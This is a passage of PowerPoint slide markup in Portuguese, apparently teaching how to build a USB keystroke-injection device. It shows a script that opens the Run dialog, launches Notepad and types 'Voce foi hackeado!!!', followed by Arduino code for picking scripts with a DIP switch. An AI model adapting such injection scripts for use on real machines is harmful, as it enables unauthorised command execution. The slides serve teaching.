              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="2252053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39C64B7F-72EF-41EA-AFE0-14F027487B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="1758126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3799FD3-8232-4121-80D7-C61F5D53171E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="1698307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D9B86441-D7EB-4D7E-9CA5-8D1ACC66742F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="1575345"/>
            <a:ext cx="11697179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9FAAAD-7EE6-46EF-A60F-9CD55FE789F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="1513725"/>
            <a:ext cx="258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as teclas Windows + R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F232D655-68B6-4EE3-84D0-D21110030342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345320" y="1392564"/>
            <a:ext cx="11697179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3543189-8269-420E-BA6B-DA9ED2F61663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396409" y="1372372"/>
            <a:ext cx="80679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DELAY 3000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t>GUI 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notepad</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1200" dirty="0"/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ENTER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Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t> foi hackeado!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t>ENTER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Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t> foi hackeado!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t>ENTER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Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t> foi hackeado!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t>ENTER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Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t> foi hackeado!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t>ENTER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t>DELAY 400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t>STRING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0" err="1"/>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t> foi hackeado!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0"/>
              <a:t>ENTER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257E5F8-5195-4976-9EDF-B9BCEF44E8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="1329143"/>
            <a:ext cx="3408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Aguarda 3 segundos para iniciar a execução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72609310-473B-49B7-A4AC-703651B2B900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="2805799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BE2467EB-FF8F-43F6-93E6-B6CC4C29DC3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="3174963"/>
            <a:ext cx="291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o Texto “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> foi hackeado!!!”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7E369F5-D086-40F7-9242-749DD0993683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="3544127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801FCF0-0229-457E-9130-EC0E3E718923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="3359545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01479B5-2E2D-4AA6-8605-6A6A81031058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="3728709"/>
            <a:ext cx="291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o Texto “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> foi hackeado!!!”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A017FFD-989A-4C19-B02B-51021C200002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="4097873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1EAE47A2-5150-4516-8DD1-8073A5B0BA79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="3913291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82E56E8-B24D-4F88-BA30-F18304ADB630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="4282455"/>
            <a:ext cx="291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o Texto “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> foi hackeado!!!”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0D3A7AF8-3A20-4EB0-A5CE-A0FCB3E431D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="4651619"/>
            <a:ext cx="621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Pausa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E99FAFF-7DD7-4396-89E2-9238AAE5566A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918669" y="4467037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29E180F3-DA04-4D87-A301-0C0034B7106F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6911091" y="4816352"/>
            <a:ext cx="291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Digita o Texto “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> foi hackeado!!!”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F2AF77F7-CC35-42CC-800C-19F1EE2995AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6911091" y="5000934"/>
            <a:ext cx="133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Pressiona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enter</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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7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2" grpId="0" animBg="1"/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47" grpId="0"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="69" grpId="0"/>
      <p:bldP spid="75" grpId="0"/>
      <p:bldP spid="76" grpId="0"/>
      <p:bldP spid="91" grpId="0" animBg="1"/>
      <p:bldP spid="92" grpId="0"/>
      <p:bldP spid="93" grpId="0" animBg="1"/>
      <p:bldP spid="94" grpId="0"/>
      <p:bldP spid="95" grpId="0" animBg="1"/>
      <p:bldP spid="2" grpId="0"/>
      <p:bldP spid="73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Tornando as coisas mais interessantes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31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F965ACC8-4BFB-4530-A6AA-BF9ADB87FD82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405665" y="1216145"/>
            <a:ext cx="11380670" cy="746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67544A07-7E3E-406A-AF62-5A94378D4AFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646854" y="1309510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8F850BBC-4A6F-4811-95A3-6DE5FAD6ED49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833913" y="1216144"/>
            <a:ext cx="1086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vez que o script é executado no cartão SD, será que há uma forma de colocar vários scripts e escolher qual será utilizado?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E9CB8F0-3DD5-44F7-94CB-9A3087060B2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2838127" y="4623175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01C82B9-D33B-4CFF-A6A7-210AE1829C78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2840371" y="4793263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DEF16252-6D66-49A5-A2AD-E44642D9B3B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2838127" y="4912318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6AB8841D-CC8B-4C81-BC2E-984284DECE4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2844560" y="5064883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E5E8FE5F-C847-4789-8B87-AA4CAF562279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2844560" y="5351739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CFD9E7F7-7DD2-442C-A81D-64EC95821201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855061" y="3147876"/>
            <a:ext cx="1150043" cy="2344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Conector reto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A755CE-574D-4B7B-A365-0490225285CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="115" idx="0"/>
            <a:endCxn id="96" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1892582" y="3677734"/>
            <a:ext cx="66100" cy="1956983"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 96618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6D900F44-D6DA-4F40-9538-E5115C761CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881144" y="4689275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F2218088-6DF1-4779-94CB-7A39261D9FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1105485" y="4689275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A9D1D57D-3C36-4FEC-905B-56E26DE5DC0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290323" y="4691167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8A36FF2-AFED-4BA1-A488-D2C0FBF5B08B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487423" y="4686589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9" name="Conector reto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F297BDA4-F590-4569-BA45-70F9394060A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="116" idx="0"/>
            <a:endCxn id="107" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1935322" y="3925434"/>
            <a:ext cx="141207" cy="1668889"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -340118"/>
              <a:gd name="adj2" fmla="val 9420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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DF0963-FC27-4692-BC71-B763BF5AF94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="117" idx="0"/>
            <a:endCxn id="110" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1968038" y="4079449"/>
            <a:ext cx="258370" cy="1481807"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -124194"/>
              <a:gd name="adj2" fmla="val 8506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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0327532-6729-4026-B709-2FE6067411D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="118" idx="0"/>
            <a:endCxn id="111" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1991233" y="4248775"/>
            <a:ext cx="415513" cy="1291140"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -38864"/>
              <a:gd name="adj2" fmla="val 6879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E33D924D-965E-4CEB-9D24-B727E0BF865C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965793" y="5253847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3" name="Conector reto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B1CCAA-CAF3-4B49-92A4-B2FC2B197B8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="122" idx="2"/>
            <a:endCxn id="112" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1922227" y="4437847"/>
            <a:ext cx="97892" cy="1878767"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33352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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21735C5D-7008-4833-B7FA-A6213C8F89FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="125" idx="2"/>
            <a:endCxn id="112" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1997671" y="4513290"/>
            <a:ext cx="106545" cy="1719228"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 314557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0A84A520-9BBD-4B5E-815F-7545EDCE9D34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125332" y="5245194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4218C11-6F11-4A05-A3C2-522707314BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276127" y="5253847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C0B9D89-F856-4D61-AB65-9311FD3A3D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435666" y="5245194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8" name="Conector reto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975F68A5-A497-4C22-ABB5-962424F92514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="126" idx="2"/>
            <a:endCxn id="112" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2077394" y="4593014"/>
            <a:ext cx="97892" cy="1568433"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33352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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B63743B4-831F-4045-A36B-A92B4601D79C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="127" idx="2"/>
            <a:endCxn id="112" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2152838" y="4668457"/>
            <a:ext cx="106545" cy="1408894"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 314557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 descr="Resultado de imagem para dips witch png&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{167D9BE0-8281-4BDC-A3AD-3C4DC1C8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3" y="4565733"/>
            <a:ext cx="938020" cy="93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tângulo 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C4414FD-0AE7-487D-B63C-8E78E4C91517}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405665" y="2178318"/>
            <a:ext cx="11380670" cy="4139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Elipse 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA463291-1648-4F58-8F78-B2EB920E46DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646854" y="2271683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F37DB80F-F0BC-49C7-90F5-FB5D48F50315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833913" y="2178317"/>
            <a:ext cx="1086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SIM! Adicionando um DIP SWITCH é possível.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4F80851-A827-409A-B296-571485BFE813}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4574497" y="3456335"/>
            <a:ext cx="3712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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>pinMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(0, INPUT_PULLUP);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pinMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(1, INPUT_PULLUP);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pinMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(2, INPUT_PULLUP);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pinMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(3, INPUT_PULLUP);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E92DF4-928F-4C3D-8778-7BD783501A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8565451" y="2769936"/>
            <a:ext cx="5501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0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>0001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>0010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>0011</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>0100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>0110</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>0111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>1001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>1010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>1011</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>1100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>1101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>1110</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>1111</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Gráfico 40" descr="Seta com curva ligeira">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7627287E-958F-48AD-82BD-7596629B953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543235" y="4095031"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Chave Esquerda 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305CC42D-355F-42F7-B12A-1544EDDE1453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7598589" y="2804205"/>
            <a:ext cx="740676" cy="3474171"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8665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5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6" grpId="0" animBg="1"/>
      <p:bldP spid="87" grpId="0" animBg="1"/>
      <p:bldP spid="88" grpId="0"/>
      <p:bldP spid="96" grpId="0"/>
      <p:bldP spid="107" grpId="0"/>
      <p:bldP spid="110" grpId="0"/>
      <p:bldP spid="111" grpId="0"/>
      <p:bldP spid="112" grpId="0"/>
      <p:bldP spid="115" grpId="0" animBg="1"/>
      <p:bldP spid="116" grpId="0" animBg="1"/>
      <p:bldP spid="117" grpId="0" animBg="1"/>
      <p:bldP spid="118" grpId="0" animBg="1"/>
      <p:bldP spid="122" grpId="0" animBg="1"/>
      <p:bldP spid="125" grpId="0" animBg="1"/>
      <p:bldP spid="126" grpId="0" animBg="1"/>
      <p:bldP spid="127" grpId="0" animBg="1"/>
      <p:bldP spid="131" grpId="0" animBg="1"/>
      <p:bldP spid="132" grpId="0" animBg="1"/>
      <p:bldP spid="133" grpId="0"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="2" grpId="0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Tornando as coisas mais interessantes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32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96" name="Retângulo 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE9CB8F0-3DD5-44F7-94CB-9A3087060B2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
